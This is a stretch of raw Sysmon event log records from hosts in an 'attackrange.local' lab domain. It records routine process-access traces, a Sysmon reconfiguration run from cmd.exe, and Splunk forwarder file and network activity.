Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.862{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.871{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 10341000x80000000000000001054673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.662{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001054672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.662{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.662{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\R
PCRT4.dll+1ae1c 10341000x80000000000000001054663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001054658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.094{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4063460C9AE4C5964BD2CEB522B1C290,SHA256=18571BFCA6FE09B749EF3FBDEC5347DD0799C9714A24BB5E72ED29C66979A46C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:45.353{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57463-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:46.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61B63DB52222432B42E245B2AEAE4A9,SHA256=40EAB358DD395C385DE36B522BCAB75537E3CC4D747035C231A26F1C64CF470C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:47.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 